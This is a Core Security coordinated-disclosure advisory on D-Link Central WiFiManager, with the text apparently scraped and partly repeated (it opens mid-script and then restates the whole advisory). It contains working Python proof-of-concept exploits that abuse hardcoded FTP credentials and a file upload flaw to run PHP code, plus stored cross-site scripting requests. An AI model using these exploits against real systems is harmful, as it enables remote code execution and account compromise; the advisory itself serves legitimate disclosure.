date_list[2][2:].split(":") return datetime.datetime(int(date_list[0]), int(date_list[1]), int(date_list[2][:2]),int(td[0]), int(td[1]), int(td[2])) session = requests.Session() session.trust_env = False php_session_id = "96sml0e9soke02k6d672oumqq4" #example (insert here the proper session id) cookie = {'PHPSESSID': php_session_id} #create tar file to upload. poc_php_file = open("poc.php", "w+") poc_php_file.write("<?php\nsystem('whoami');\n?>") poc_php_file.close() poc_tar_file = tarfile.open("poc_tar_file.tar", mode="w") poc_tar_file.add("poc.php") poc_tar_file.close() #get server datetime. get_server_time_from_requested_file = session.get('https://127.0.0.1/index.php/ReportSecurity/ExportAP/type/TXT', cookies=cookie, verify=False) date = re.search("Date(.*)\d", get_server_time_from_requested_file.text).group().replace('DateTime ', '') #generate epoch from server's date epoch = int(time.mktime(parse_to_datetime(date).timetuple())) #upload attack PHP file. attack_tar_file = "poc_tar_file.tar" tar_file = {'stylename': 'attack', 'logfile': open(attack_tar_file, 'rb')} restore_backup_response = session.post('https://127.0.0.1/index.php/Config/onUploadLogPic', files=tar_file, cookies=cookie, verify=False) for i in range(0,20): #get the uploaded file named after time epoch, returned by PHP time() function. filename = str(epoch) + "/" + "poc.php" get_uploaded_file = session.get('https://127.0.0.1/captivalportal/%s' %filename, verify=False) if get_uploaded_file.status_code == 200: print "Remote Code Execution Achived" print get_uploaded_file.text break epoch += 1 -----/ 7.3. *Cross-Site Scripting in the application site name parameter* [CVE-2018-17443] The 'sitename' parameter of the UpdateSite endpoint is vulnerable to a stored Cross Site Scripting: The following is a proof of concept to demonstrate the vulnerability: /----- POST /index.php/Config/UpdateSite HTTP/1.1 Host: 10.2.45.220 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.2.45.220/index.php/Config/CreatSite Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US; PHPSESSID=4fvbnmn343424rg8m1jg3qbc05 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 66 siteid=0&sitename=<script>alert(1)</script>&sitenamehid=fakesitename&UserMember%5B%5D=1 -----/ 7.4. *Cross-Site Scripting in the creation of a new user* [CVE-2018-17441] The 'username' parameter of the addUser endpoint is vulnerable to a stored Cross Site Scripting. The following is a proof of concept to demonstrate the vulnerability: /----- POST /index.php/System/addUser HTTP/1.1 Host: 10.2.45.220 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.2.45.220/index.php/System/userManager Content-Type: application/x-www-form-urlencoded; Content-Length: 96 Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US; PHPSESSID=4fvbnmn343424rg8m1jg3qbc05 Connection: close username=<script>alert(1)</script>&userpassword=fakepassword&level=1&email=&remark=&userid=0&creator=1&mandatory=change& -----/ 8. *Report Timeline* 2018-06-04: Core Security sent an initial notification to D-Link, including a draft advisory. 2018-06-06:D-Link confirmed the reception of the advisory and informed they will have an initial response on 06/08. 2018-06-08: D-Link informed that they would provide a schedule for the fixes on 06/13. 2018-06-08: Core Security thanked the update. 2018-06-14: D-Link informed its plan of remediation and notified Core Security that the fixed version will be available on 08/31. 2018-06-15: Core Security thanked the update and proposed to keep in regular contact until this tentative release date. 2018-07-23: Core Security requested a status update. 2018-07-25: D-Link answered saying that they are still targeting 08/31 as the release date. 2018-08-24: Core Security requested a new status update and a solidified release date for the fixed version. 2018-08-28: D-Link sent a beta version for test. 2018-08-30: Core Security tested the beta version and requested D-Link to coordinate a release date. 2018-09-21: D-Link informed that they were planning a security announcement and they were ready to schedule a disclosure date. 2018-09-24: Core Security thanked the update and proposed October 4th as the publication date. 2018-10-04: Advisory CORE-2018-0010 published. 9. *References* [1] http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/. 10. *About CoreLabs* CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security* Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com<mailto:info@coresecurity.com> 12. *Disclaimer* The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

An issue was discovered on D-Link Central WiFi Manager before v 1.03r0100-Beta1. An unrestricted file upload vulnerability in the onUploadLogPic endpoint allows remote authenticated users to execute arbitrary PHP code. D-Link Central WiFi Manager Contains a vulnerability related to unlimited uploads of dangerous types of files.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. *Advisory Information* Title: D-Link Central WiFiManager Software Controller Multiple Vulnerabilities Advisory ID: CORE-2018-0010 Advisory URL: http://www.coresecurity.com/advisories/d-link-central-wifimanager-software-controller-multiple-vulnerabilities Date published: 2018-10-04 Date of last update: 2018-10-04 Vendors contacted: D-Link Release mode: Coordinated release 2. *Vulnerability Information* Class: Unrestricted Upload of File with Dangerous Type [CWE-434], Improper Authorization [CWE-285], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-17440, CVE-2018-17442, CVE-2018-17443, CVE-2018-17441 3. *Vulnerability Description* D-Link's website states that: [1] Central WiFiManager Software Controller helps network administrators streamline their wireless access point (AP) management workflow. Central WiFiManager is an innovative approach to the more traditional hardware-based multiple access point management system. It uses a centralized server to both remotely manage and monitor wireless APs on a network. Also, two stored Cross Site Scripting vulnerabilities were found. 4. *Vulnerable Packages* . Central WifiManager v1.03 Other products and versions might be affected, but they were not tested. 5. *Vendor Information, Solutions and Workarounds* D-Link released the following Beta version that addresses the reported vulnerabilities: . Central WifiManager v 1.03r0100-Beta1 In addition, D-Link published a security note in: https://securityadvisories.dlink.com/announcement/publication.aspx?name=SAP10092 6. *Credits* These vulnerabilities were discovered and researched by Julian Munoz from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* D-Link Central WiFiManager Software Controller exposes an FTP server that serves by default in port 9000 and has hardcoded credentials (admin, admin). On 7.2 we show a similar attack to but in this case with an authenticated user in the web application. The application has a functionality to upload a .rar file used for the captive portal displayed by the Access Points. We will craft a .rar with a PHP file that we will end up executing in the context of the web application. When the .rar is uploaded is stored in the path "\web\captivalportal" in a folder with a timestamp created by the PHP time() function. In order to know what is the web server's time we request an information file that contains the time we are looking for. After we have the server's time we upload the .rar, calculate the proper epoch and request the appropriate path increasing this epoch by one until we hit the correct one. Finally, we discovered two Cross-Site Scripting, one on the update site functionality, in the 'sitename' parameter (7.3) and the other one on the creation of a local user in the 'username' parameter (7.4). 7.1. /----- import requests from ftplib import FTP #stablish connection with FTP server host_ip = "127.0.0.1" ftp = FTP() ftp.connect(host=host_ip<ftp://ftp.connect(host=host_ip>, port=9000) ftp.login(<ftp://ftp.login(>"admin", "admin") data = [] #create PHP poc file poc_php_file = open("poc.php", "w+") poc_php_file.write("<?php\nsystem('whoami');\n?>") poc_php_file.close() #upload PHP poc file php_file = open("poc.php", "rb") ftp.cwd('/web/public')<ftp://ftp.cwd('/web/public')> ftp.storbinary(<ftp://ftp.storbinary(>"STOR write_file.php", php_file) ftp.dir(data.append)<ftp://ftp.dir(data.append)> ftp.quit()<ftp://ftp.quit()> for line in data: print "-", line session = requests.Session() session.trust_env = False #get the uploaded file for remote code execution get_uploaded_file = session.get('https://127.0.0.1/public/write_file.php', verify=False) print get_uploaded_file.text -----/ 7.2. /----- import re import time import requests import datetime import tarfile def parse_to_datetime(date_string): date_list = date_string.split("-") td = date_list[2][2:].split(":") return datetime.datetime(int(date_list[0]), int(date_list[1]), int(date_list[2][:2]),int(td[0]), int(td[1]), int(td[2])) session = requests.Session() session.trust_env = False php_session_id = "96sml0e9soke02k6d672oumqq4" #example (insert here the proper session id) cookie = {'PHPSESSID': php_session_id} #create tar file to upload. poc_php_file = open("poc.php", "w+") poc_php_file.write("<?php\nsystem('whoami');\n?>") poc_php_file.close() poc_tar_file = tarfile.open("poc_tar_file.tar", mode="w") poc_tar_file.add("poc.php") poc_tar_file.close() #get server datetime. get_server_time_from_requested_file = session.get('https://127.0.0.1/index.php/ReportSecurity/ExportAP/type/TXT', cookies=cookie, verify=False) date = re.search("Date(.*)\d", get_server_time_from_requested_file.text).group().replace('DateTime ', '') #generate epoch from server's date epoch = int(time.mktime(parse_to_datetime(date).timetuple())) #upload attack PHP file. attack_tar_file = "poc_tar_file.tar" tar_file = {'stylename': 'attack', 'logfile': open(attack_tar_file, 'rb')} restore_backup_response = session.post('https://127.0.0.1/index.php/Config/onUploadLogPic', files=tar_file, cookies=cookie, verify=False) for i in range(0,20): #get the uploaded file named after time epoch, returned by PHP time() function. filename = str(epoch) + "/" + "poc.php" get_uploaded_file = session.get('https://127.0.0.1/captivalportal/%s' %filename, verify=False) if get_uploaded_file.status_code == 200: print "Remote Code Execution Achived" print get_uploaded_file.text break epoch += 1 -----/ 7.3. *Cross-Site Scripting in the application site name parameter* [CVE-2018-17443] The 'sitename' parameter of the UpdateSite endpoint is vulnerable to a stored Cross Site Scripting: The following is a proof of concept to demonstrate the vulnerability: /----- POST /index.php/Config/UpdateSite HTTP/1.1 Host: 10.2.45.220 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.2.45.220/index.php/Config/CreatSite Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US; PHPSESSID=4fvbnmn343424rg8m1jg3qbc05 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 66 siteid=0&sitename=<script>alert(1)</script>&sitenamehid=fakesitename&UserMember%5B%5D=1 -----/ 7.4. *Cross-Site Scripting in the creation of a new user* [CVE-2018-17441] The 'username' parameter of the addUser endpoint is vulnerable to a stored Cross Site Scripting. The following is a proof of concept to demonstrate the vulnerability: /----- POST /index.php/System/addUser HTTP/1.1 Host: 10.2.45.220 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.2.45.220/index.php/System/userManager Content-Type: application/x-www-form-urlencoded; Content-Length: 96 Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US; PHPSESSID=4fvbnmn343424rg8m1jg3qbc05 Connection: close username=<script>alert(1)</script>&userpassword=fakepassword&level=1&email=&remark=&userid=0&creator=1&mandatory=change& -----/ 8. *Report Timeline* 2018-06-04: Core Security sent an initial notification to D-Link, including a draft advisory. 2018-06-06:D-Link confirmed the reception of the advisory and informed they will have an initial response on 06/08. 2018-06-08: D-Link informed that they would provide a schedule for the fixes on 06/13. 2018-06-08: Core Security thanked the update. 2018-06-14: D-Link informed its plan of remediation and notified Core Security that the fixed version will be available on 08/31. 2018-06-15: Core Security thanked the update and proposed to keep in regular contact until this tentative release date. 2018-07-23: Core Security requested a status update. 2018-07-25: D-Link answered saying that they are still targeting 08/31 as the release date. 2018-08-24: Core Security requested a new status update and a solidified release date for the fixed version. 2018-08-28: D-Link sent a beta version for test. 2018-08-30: Core Security tested the beta version and requested D-Link to coordinate a release date. 2018-09-21: D-Link informed that they were planning a security announcement and they were ready to schedule a disclosure date. 2018-09-24: Core Security thanked the update and proposed October 4th as the publication date. 2018-10-04: Advisory CORE-2018-0010 published. 9. *References* [1] http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/. 10. *About CoreLabs* CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security* Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com<mailto:info@coresecurity.com> 12. *Disclaimer* The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/